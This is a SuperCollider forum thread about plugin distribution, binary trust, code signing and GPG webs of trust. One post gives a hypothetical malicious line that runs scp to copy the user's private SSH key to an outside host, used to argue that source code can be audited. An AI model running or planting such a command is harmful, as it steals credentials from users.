Moving some SC3Plugins into the "Core"…

Yes, Arch binaries are signed by trusted users. I was an Arch user for many years, a long time ago. They are built in isolated build environments, like any other serious distribution.

The xz backdoor would reach Arch before other distros just because Arch updates often. That’s all I said.

Also, the xz case involved a lot of social engineering so that a person could become “trusted”.

At the same time, the AUR (Arch User Repository) build scripts are also part of the system. Those are built locally. I contributed many audio-related PKGBUILDs.

Yes, but that’s still a vulnerability. If the build environment gets hacked (and it has been demonstrated many times that there are numerous ways this can happen), then those binaries are compromised.

And Arch is a fairly high value target.

PKGBUILDs, at least if you’re reasonably technical, are less vulnerable because you can audit them.

E.g. if James Harkins put a "scp ~/.ssh/id_rsa example.com".unixCmd in a popular ddw* Quark, it would likely be discovered at some point and would carry a great reputational cost for him.

So you trust his source code, but wouldn’t trust his binaries?

My point above, about open-source, auditable, same-for-all-OS-and-arch code is that the question is not really about trusting an individual user (or a large group of them).
We can and do inspect sclang code every day. We actually don’t just rely on “James seems like a great guy, I’m sure it’s all fine.” (James, sorry to be using you as an example!)

Even if you did trust a developer, they couldn’t be expected to provide binaries for all OSes and architectures. So now you might have a relatively-random person compiling for Windows, let’s say, and they can modify the code however they want, trivially.

The key point, to me, is that you can’t both have:

  1. Binary distribution
  2. An “open world” with no (or minimal) core UGens

This is the security (and stability) nightmare scenario: users are just thrown into the internet to look for cool sounds, maybe given hints about what’s best by more- or less-honest people.

“Install this plugin” on a random github page: it’s the problems of shareware all over again.

All of us have to trust binaries in some part of our lives, but I think people are not appreciating how quickly you can go from fairly trustworthy to not trustworthy at all, by relaxing a few requirements. There is safety in the status quo, and while we need to modernize what plugins are available, this really seems like the wrong way to go. (It also seems like a huge amount of new code to write and set of services to maintain.)

My alternative plan is to tweak the status quo, with three categories in ascending levels of trust:

  1. The open internet
    • People hack on new plugins as they do today, published wherever they like
    • The custom is to distribute source code and motivated early adopters can compile the code themselves (again, as they do today)
    • These early adopters can begin to audit the code, if they want, and maybe join with the authors to improve the plugins
  2. The “outer core”: a replacement (or revamp) of sc3-plugins
    • A grab-bag of things which are useful and popular enough that power users might want to try
    • Has a group of maintainers who audit the code for stability and security. They don’t necessarily verify the code is correct or elegant or efficient.
    • If plugins are old, bad, unmaintained, etc. yank them out! There shouldn’t be a long-term expectation that plugins here won’t change or be removed.
      • Maintainers of the “outer core” are not expected to improve these plugins, either. If a plugin needs improvement it should be improved by its author or someone else motivated.
    • Binaries can maybe be provided, possibly even through package managers like apt, but building from source should be easy
      • These binaries would need good chain of custody, signing, etc.
    • There’s a process for a plugin author to (try to) get their plugin added to this outer core
  3. Inner core: what ships with SC
    • These currently are trustworthy and many have been working for decades with minor or no changes. Keep them there.
    • There should be an expectation that a piece written with these will continue to play in the future
    • If you apt install supercollider, you’ll definitely get these - maybe as binaries
    • Very rarely, a plugin from the outer core proves to be so stable and so useful that it moves into the inner core where everyone can use it with ease
      • The majority of the work for this should not fall on the core maintainers, but on the group petitioning for a plugin’s inclusion

I think this is pretty close to what we’re already doing, with some tweaks to help us modernize. The only big ask is that a group of maintainers step up to dust off sc3-plugins (or to start a modern equivalent). This seems like much less work than building a trustworthy method of cross-platform, open-world binary distribution.

1 Like

The cross-platform work Linux distros do with trusted users and isolated build environments (which by itself requires a framework, etc.) is substantial. And yet I wonder why the Linux world hasn’t changed this model, instead of replicating this insanity in every distro.

When a UGen is simple, compiling locally would be much simpler. Emacs, for example, compiles vterm and other simple programs locally; you barely notice it. I know some UGens are not simple, but they are not that complex.

When a UGen is simple, compiling locally would be much simpler. Emacs, for example, compiles vterm and other simple programs locally; you barely notice it.

Emacs compiles elisp files. Not the same thing at all.

I know some UGens are not simple, but they are not that complex.

Anything involving C++, CMake and any external libraries is complex.

1 Like

It compiles vterm from C.

Even if you did trust a developer, they couldn’t be expected to provide binaries for all OSes and architectures.

Well, we are already expected to do this. With a package manager like Deken it would be easier to offload compilation to other (trusted) users. Although in practice developers will likely continue to provide all binaries. With GitHub actions it’s not that hard, see Automatically build, compile and release SuperCollider plugins using Github Actions | Mads Kjeldgaard. (Personally, I’m using the CI system of my ex-university.)

The key point, to me, is that you can’t both have:

  1. Binary distribution
  2. An “open world” with no (or minimal) core UGens

Of course you can! Pd is living proof of it. What you can’t have is perfect security. Most users just don’t care. But again, if a user has security concerns, they can always build from source – or use their system package manager.

“Install this plugin” on a random github page: it’s the problems of shareware all over again.

But that’s already the status quo! With the added downside that plugins are not discoverable.

  1. The open internet

    These early adopters can begin to audit the code, if they want, and maybe join with the authors to improve the plugins

And then what? You did not provide any solution for the issue of distribution and discoverability.

  1. The “outer core”: a replacement (or revamp) of sc3-plugins

How do you envision this replacement or revamp? How would it be different from the current monorepo?

Has a group of maintainers who audit the code for stability and security.

Where do you expect to find this group of maintainers? We barely have enough maintainers to maintain SC itself. IMO it makes more sense for each author to take care of their own plugins.

There’s a process for a plugin author to (try to) get their plugin added to this outer core

There is a limit on how big such a monorepo can grow before it becomes completely unmaintainable.

As I said, sc3plugins is already frozen. There have been quite a few new UGen plugins in the last few years but none of them have been added to sc3plugins. I think the authors (including myself) have not even tried because the development model just isn’t attractive. I want to work on my plugins at my own pace and not coordinate releases with dozens of other plugin authors.

That being said, a set of trusted community-vetted plugins would still be a good idea, but this can be provided as some sort of “meta-quark”. The individual plugins could be built with SC’s CI pipeline and hosted on the SC website (just as they currently are).

I think this is pretty close to what we’re already doing

Yes, but it does not solve the issues I have been pointing out, most notably the distribution and discoverability of plugins outside of sc3plugins or the “outer core”.

This seems like much less work than building a trustworthy method of cross-platform, open-world binary distribution.

You are right that adding support for binaries requires some work, but I’m pretty sure it would pay off in the long run. It certainly did for Pd.

Also, this is not only about server plugins. In the future we will hopefully also get language plugins. In fact, I already have concrete ideas for a language plugin interface; I just don’t have the time to make a PoC…

1 Like

100 percent in favor of adding the capability to distribute binaries through the Quarks system. In terms of next steps, perhaps an RFC is in order?

2 Likes

(Apologies in advance for the long message, but I do believe I’m addressing many points without much repetition:)

in practice developers will likely continue to provide all binaries. With GitHub actions it’s not that hard, see Automatically build, compile and release SuperCollider plugins using Github Actions | Mads Kjeldgaard. (Personally, I’m using the CI system of my ex-university.)

IMO developer-provided binaries bring us from a good security model back to the problems of Windows shareware decades ago. GitHub Actions could be a step in the right direction (more on that below).

The key point, to me, is that you can’t both have:

  1. Binary distribution
  2. An “open world” with no (or minimal) core UGens

Of course you can! Pd is living proof of it.

Pd is living proof of what? Can you provide more information here about how Pd handles security? All I’ve heard so far is that:

  • Anyone in the world can upload multiple binaries,
  • which cannot reasonably be inspected,
  • are different for every OS and CPU architecture,
  • which are downloaded and run on a user’s computer unsandboxed,
  • with full user privileges,
  • which have so far not been caught doing anything malicious,
  • that you’ve personally heard about

Which of these points are wrong?

(I’m assuming the binary distribution is at least immutable, i.e. everyone requesting a plugin for an OS+arch pair gets the same binary, but is this actually true?)

What you can’t have is perfect security. Most users just don’t care.

What I’m proposing is not perfect security: there’s plenty of surface area for a motivated attacker.
What I’m proposing instead is basic security: can we at all say what the binaries we’re running are doing?

I don’t agree that most users don’t care, and further I think most of the ones who don’t care would care if they had the decision explained to them.
Most users exist in a tranquil multi-decade tradition of chain of custody that you’re proposing breaking.

“Install this plugin” on a random github page: it’s the problems of shareware all over again.

But that’s already the status quo!

The status quo is “here’s my C++, feel free to inspect it and compile it”

What you’re proposing is “click this button to run my binary on your computer”

You did not provide any solution for the issue of distribution and discoverability.

My vision would be that, similar to today:

  1. SC (the inner core) is for everyone and proud of it
  2. The “outer core,” be it sc3-plugins or something new, is for power users who are willing to live with some rough edges
  3. The open internet is for the avant-garde, people who want to try bleeding-edge stuff and can either read the code, know the developer, or want to live dangerously

A person who just wants to try SC should be using #1, and if they outgrow it maybe experiment with #2. It would be a huge misfeature to make unsophisticated users wade through possibly incomplete, buggy or worse plugins.

Where do you expect to find this group of maintainers? We barely have enough maintainers to maintain SC itself. IMO it makes more sense for each author to take care of their own plugins.

For any of the work we’re discussing, your solution or mine, motivated people would need to step up.
Without people’s labor, we’re stuck with the status quo.
I think we’re discussing what direction motivated people might want to move in.
(Also, writing a multi-platform binary package manager with decentralized discoverability seems like a lot more work to me, personally)

There’s a process for a plugin author to (try to) get their plugin added to this outer core

There is a limit on how big such a monorepo can grow before it becomes completely unmaintainable.

Is that true? And if it is, like Scott, I’d be glad to have that problem. If so many people start developing high-quality plugins that it becomes too much to handle, we could certainly split from one repo to different repos for instruments, reverbs, etc.

But it’s true that the “outer core” doesn’t need to be a monorepo. It could even consist of git submodules so plugin developers can work in their own repos (assuming they use git). The point is that it’s audited by trusted members of the developer team.

sc3plugins is already frozen. There have been quite a few new UGen plugins in the last few years but none of them have been added to sc3plugins.

Right, we both agree the status quo is stagnant. My proposal is to allow the “outer core” to be revitalized, including ripping out any old stuff that’s too much of a maintenance burden.

I think the authors (including myself) have not even tried because the development model just isn’t attractive. I want to work on my plugins at my own pace and not coordinate releases with dozens of other plugin authors.

This is an important point: development needs to be easy for authors. I don’t think my proposal prevents that, though.

That being said, a set of trusted community-vetted plugins would still be a good idea, but this can be provided as some sort of “meta-quark”. The individual plugins could be built with SC’s CI pipeline and hosted on the SC website (just as they currently are).

Building with a trusted open-source CI pipeline, with all files coming from VCS, with automatic uploads to a central trusted host, would be a big improvement to your proposal as long as chain of custody remained unbroken. That to me sounds a lot like sc3-plugins today, though. I don’t know how it would work without what I’m calling an “outer core,” some kind of vetting.

1 Like

Can you provide more information here about how Pd handles security?

You need to register for an account to upload packages. For each package the user can see by whom and when it was uploaded. That’s good enough for most people (including myself). If you want to be careful, you can verify the GPG signature (if present), see GitHub - pure-data/deken: Externals wrangler for Pure Data. If you do not trust the binaries, you can always build your plugins from source. If you are on Linux, you can use your system package manager.

I should also mention that most popular packages are developed and uploaded by trusted community members. When I see that a package has been uploaded by zmoelnig, for example, the chance for it being malicious is practically zero.

Deken has been around for almost 8 years. I cannot recall a single incident. Pd is not NPM or Debian. You are right that there is a risk, but for me it’s negligible.

The status quo is “here’s my C++, feel free to inspect it and compile it”

No, in practice it’s not.

What you’re proposing is “click this button to run my binary on your computer”

But that is the reality. I’m sure that most people who, for example, use VSTPlugin just download my prebuilt binaries. You really cannot expect regular SC users to fiddle with CMake and C++ compiler toolchains.

(Also, writing a multi-platform binary package manager with decentralized discoverability seems like a lot more work to me, personally)

Who said it has to be decentralized? I would rather tend towards a centralized solution.

Regarding the development work: the basic Quark infrastructure is already there. The hardest part is probably finding a place to host the binaries. (I do not propose that Quarks should download binaries from random URLs.)

That to me sounds a lot like sc3-plugins today, though.

The biggest issue with sc3-plugins IMO is the development model. It’s a big monorepo where plugin authors cannot make individual releases. How should development in this new “outer core” actually work? Say, I discover a bug in my plugin. Do I have to wait until someone (who?) decides it’s time for the next release of the whole plugin set?

How large should this “outer core” be at maximum? What about all the other plugins? Just to give you a perspective, Deken currently hosts 241 libraries, many of which contain dozens, sometimes even hundreds of objects, see Deken - Pure Data externals Database.

1 Like

Guys, one thing to remember is how much bigger that is for Pd than for SC. I remember trying to compile pd-extended back in the day, and it took so long I don’t even remember how long. These are not problems at the same scale.

Let’s put security and practicality back in balance. And nothing is perfect in this area anyway.

I believe that “trusted users” (the weak part that will be up for discussion) signing the binaries is a moderate and sensible level of security compatible with this project’s scale. Yes, there are risks, and some people with privileges can sometimes lose it and do or say crazy things. (I don’t think an isolated build environment is practical for us, for example).

Building from source for those requiring more security will also be available.

1 Like

I thought about the same thing. We could show some kind of badge (e.g. “verified”) if a plugin has been reviewed and uploaded by a trusted user.

1 Like

If the binary is signed, the packager will need to use their key, and the user will need to be able to verify. So they just need to “trust a user” (import the pub key) once. This can be shown in the UI as a badge.

EDIT: One step further into security (and MORE convenient) would be the “web of trust” model. It’s something the community would need to decide. With this model, the user just needs to import the master keys once, and the web of trust will automatically accept other “trusted users”. I feel this one fits the SC project…

https://www.gnupg.org/gph/en/manual.html#AEN385

EDIT2: Those security tools are already part of all systems (in case someone thinks I’m suggesting these things would need to be implemented from scratch, etc.). The work would be more collective organization than writing code.
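
To make the flow concrete with tools that already exist: below is a minimal sketch, in sclang, of what a verification step could look like. This is hypothetical (the Quarks system has no such hook today, and the file names, paths and key setup are made up), but everything it relies on (gpg and the user's keyring) is already installed on most systems.

    // Hypothetical sketch only: Quarks has no such hook today, and the
    // archive name, paths and key handling are placeholders.
    // Idea: before unpacking a downloaded plugin binary, check its detached
    // GPG signature against keys already imported into the user's keyring.
    (
    var archive = "~/Downloads/MyPlugin-macOS-x86_64.zip".standardizePath;
    var signature = archive ++ ".asc";
    var exitCode;

    // gpg exits with 0 only if the signature is valid and was made by a key
    // the user has imported (e.g. a "trusted user" or master key).
    exitCode = ("gpg --verify" + signature.quote + archive.quote).systemCmd;

    if(exitCode == 0) {
        "Signature OK -- installing plugin".postln;
        // ... unpack into Platform.userExtensionDir here ...
    } {
        "Signature verification FAILED -- not installing".warn;
    };
    )

The decision about whose keys to trust (individual trusted users, or a web of trust rooted in a few master keys) would stay with the user, as described above.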

My experience with compiling anything is that it’s a crap shoot at best. And I’m reasonably technical.

If you mandate any security feature, you will have to deal with the majority of people who cannot get that stuff to work. See, for example, the current nightmare about signed packages on OSX (getting unsigned VSTs to work on the Mac is a pain, even if you know the right incantations).

Giving people tools so they can manage this if they want is fine. Mandating it is going to end in lots of stuff ‘not working’, and lots of support time spent trying to help people.

In a web of trust model, I think you just need the master keys. The quark system could check a key server when a new trusted user key is found. The user can disable signature checking at any time.

I think PGP and the web of trust model may be the only solutions that would satisfy the two opposing views in this discussion. It is very simple and convenient, and it’s as close to military-grade encryption (or, in this case, certification) as we can get.

In a web of trust model, I think you just need the master keys. The quark system could check a key server when a new trusted user key is found. The user can disable signature checking at any time.

No, a sophisticated user can disable signature checking. For most users you’re just adding another thing to go wrong - and it will go wrong.

Most people don’t understand any of this stuff, nor do they really want to learn it just so they can make some sounds with some piece of software that their buddy told them about. Instead the thought process will go - I tried it, it didn’t work, oh well what can you expect from a free piece of software. THE END.

2 Likes

You are right.

Maybe we don’t have the capacity to do it. The quarks package manager is buggy and featureless; let’s be realistic.

By the way, I remember now that I started using Arch before the keyring existed, and experienced the first version of pacman-key (a wrapper for GnuPG, adapted from a Debian script… nothing fancy).

To reiterate, things can go right if done right. Maybe we just don’t have enough people.

Let’s remember that the push to democratize encryption technology was MUCH stronger just a few years ago. Now it seems we’ve “given up”. Remember the conversation between the Cypherpunks 10 years ago:

https://www.youtube.com/watch?v=zlqOmAOqEmk

Hi,
this is a comment more or less related to this thread, concerning a good practice we should adopt when coding. It would be very convenient, both for ourselves and for sharing code, to list in a heading comment all the external classes, UGens, Quarks, and so on (with their respective GitHub or other links if needed) required to run the code in question.
For instance:

// require: VSTPlugin [ https://git.iem.at/pd/vstplugin/-/releases ]
1 Like

That’s good practice, since we don’t have better tools. Also good practice: add the version and commit hash for each quark and plugin in a project (sometimes there is no versioning, sometimes the quark changes too fast).
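
For instance, a project header could look like the sketch below (everything except the VSTPlugin link from the post above is a made-up placeholder; adjust names, versions and hashes to your own project):

    // Dependencies for this piece (names, versions and hashes are examples only):
    // require: VSTPlugin [ https://git.iem.at/pd/vstplugin/-/releases ], tested with 0.5.x
    // require: SomeQuark [ https://github.com/someuser/SomeQuark ], commit a1b2c3d
    // require: sc3-plugins (for the extra UGens used in the SynthDefs)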